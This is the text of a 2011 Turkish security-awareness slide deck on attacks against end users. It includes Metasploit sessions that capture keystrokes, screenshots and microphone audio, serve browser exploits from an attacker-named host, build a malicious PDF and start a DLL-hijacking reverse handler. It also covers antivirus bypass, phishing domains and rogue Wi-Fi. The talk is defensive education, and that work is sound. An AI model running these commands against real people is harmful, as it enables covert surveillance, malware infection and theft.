Son Kullanıcıya Yönelik Güncel Siber Tehditler

Son Kullanıcıya Yönelik Güncel Siber
Tehditler
Ozan UÇAR
[email protected]
Marmara Üniversitesi
İstanbul 2011
Konuşmacı Hakkında
• Ozan UÇAR
• Bilgi Güvenliği Danışmanı
– Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr)
• Blog Yazarı
– www.cehturkiye.com
• İletişim
– Skype: ozan.ucar
– Kişisel Eposta: [email protected]
www.bga.com.tr
2
Ajanda
•
•
•
•
•
•
•
Hacker’ların ve Güvenlik Dünyasının Gidişatı
Son Kullanıcıya Yönelik Saldırı Türleri
Başarılı Bir Saldırı Sonrası Olası Tehditler
Casus Yazılım Tehlikeleri
İstemci Bilgisayarlar Nasıl Korunuyor
Uygulamalar
Korunma Yöntemleri
www.bga.com.tr
3
Hacking Kültürü Hakkında
Bilgisayar yer altı dünyası bir aynalı salondur.
Gerçekler bükülür, doğrular küçülür.
www.bga.com.tr
4
Güvenlik Dünyasının Gidişatı
Firewall
IDS/IPS
WAF
Hacker’larin Gidişatı
Client
inSecurity
Mobile
inSecurity
Social
Networks/Eng.
Son Kullanıcıya Yönelik Saldırı Türleri
•
•
•
•
•
•
•
•
•
Browser (İnternet Tarayıcılar)
Eposta Yazılımları
PDF Okuyucular
Office Yazılımları
XSS Saldırıları
Java Uygulamaları
Media Player
Casus Yazılımlar
Sosyal Mühendislik
www.bga.com.tr
7
Saldırı Sonrası Olası Tehditler
• Keylogger Kurulumu
– Klavye girişlerinin dinlenmesi
• Webcam Casusu
– Gizli video kaydı ve fotoğraf
• Ortam Dinleme
– Ses kaydı
• Veri Sızdırma
– Kayıtlı parolalar, önemli ofis dosyaları vb.
• Bilgisayarı Köleleştirme
– Botnet ordusuna katılma, DDOS saldırılarında bulunma
www.bga.com.tr
8
Son Kullanıcı Bilgisayarlarları Nasıl
Korunuyor ?
• Antivirüs Yazılımları
– Antivirus motorları
– İmza tabanlı & Sezgisel
– Bypass teknikleri
• Kişisel Firewall Yazılımları
– Atlatma senaryoları ...
• Bilinç
– Farkındalık ve eğitimin önemi
www.bga.com.tr
9
Tanınmaz Casus Yazılım Oluşturmak
Antivirus test
Tarama Sonucu:
www.virustotal.com/file-scan/report.html?id=728f30350259034aac5af95dd7a3cbe56612b31347c37005e9f7508c05c0d6fc-1322614624
www.bga.com.tr
10
Meterpreter | Keylogger
Keylogger olarak kullanımı;
> keyscan_start
> keyscan_dump
Hedefin ekran görüntüsünü ele geçirme
> screeshot
www.bga.com.tr
11
Meterpreter | Webcam Casusu
Webcam görüntüsünü ele geçirmek
Webcam canlı video görüntüsünü almak
www.bga.com.tr
12
Meterpreter | Ortam Dinleme
Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir.
> record_mic -d 25 // 25. sn boyunca dinleme yap ve kaydet.
[*] Starting...
[*] Stopped
Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav
www.bga.com.tr
13
Browser Tabanlı Açıklıklar
• Bir browser exploiti, kötü amaçlı geliştirilmiş
zararlı kod parçasıdır.
• Kullanıcının bilgisi olmadan, bilgisayarına
zararlı yazılım bulaştırmak veya izinsiz/yetkisiz
değişikliklerde bulunmak için kullanılır.
• Zararlı kod; HTML, Image, Java, Javascript,
ActiveX veya başka bir web teknolojisi olabilir.
• Zayıflıklar, browser teknolojisinden veya
eklentilerinden kaynaklanabilir.
www.bga.com.tr
14
Browser Tabanlı Açıklıklar | Uygulama
• Browser Autopwn; Firefox, IExplorer, Chrome,Opera
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST saldirgan.com
LHOST => 85.95.238.172
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /giris
URIPATH => /giris
msf auxiliary(browser_autopwn) > exploit
[*] --- Done, found 23 exploit modules
[*] Using URL: http://0.0.0.0:80/giris
[*] Local IP: http://saldirgan.com :80/giris
www.bga.com.tr
15
PDF Okuyucular| Uygulama
PDF formatının popüler olması ile birlikte, PDF
okuyucuların açıklıklarları etkili bir hacking
malzemesi haline gelmiştir.
• Adobe Reader
msf > use exploit/windows/fileformat/adobe_geticon
msf exploit(adobe_geticon) > set FILENAME belge.pdf
FILENAME => belge.pdf
msf exploit(adobe_geticon) > exploit
[*] Creating 'belge.pdf' file...
[+] belge.pdf stored at /var/www/belge.pdf
www.bga.com.tr
16
Office Yazılımları| Uygulama
Microsoft Word RTF pFragments Stack Buffer Overflow
(File Format)
• Microsoft office 2010, 2007 ve 2003 sürümlerini etkileyen ve
gelişi güzel kod çalıştırmayı sağlayan açıklık.
www.bga.com.tr
17
Windows DLL Hijacking
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set EXTENSIONS “pdf doc xls jpg"
msf exploit(webdav_dll_hijacker) > set LPORT 9999
msf exploit(webdav_dll_hijacker) > set LHOST (your IP address)
msf exploit(webdav_dll_hijacker) > exploit
[*] Started reverse handler on 85.95.238.172:4444
[*] Exploit links are now available at \\85.95.238.172\documents\
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.226:80/
[*] Server started.
www.bga.com.tr
18
Windows DLL Hijacking
www.bga.com.tr
19
Sosyal Mühendislik Saldırıları
Teknik sorunlar teknik yollarla çözülür, insan
tabanlı sorunlar insanla çözülür …
• Oltalama saldırıları
– facebook.com > facabook.com
• Bir web sitesinin bire bir benzerini (clone)
oluşturmak
• Java Uygulamaları
• Sahte Kablosuz Ağlar
www.bga.com.tr
20
SM | Oltalama Saldırıları
1
2
3
www.bga.com.tr
21
SM | Web Clone & Java Applet
Social-Engineer Toolkit
Java uygulaması
olarak casus
yazılım bulaştırma
www.bga.com.tr
22
Sahte Kablosuz Erişim Noktaları
•
•
•
Yalnızca amacı kötü olduğu için “sahte” olarak isimlendirilir, gerçeğinden
ayırt edilemez 
Kablosuz ağ istemcileri, saldırgan tarafından yayın yapan kablosuz ağa
dahil oldukdan sonra, tüm internet trafiği kaydedilir.
DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir.
www.bga.com.tr
23
Sahte Kablosuz Erişim Noktaları
Saldırı yapılan sistemden ekran görüntüsü
www.bga.com.tr
24
Sahte Kablosuz Erişim Noktaları
İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban
bilgisayara yüklenir.
www.bga.com.tr
25
Teşekkürler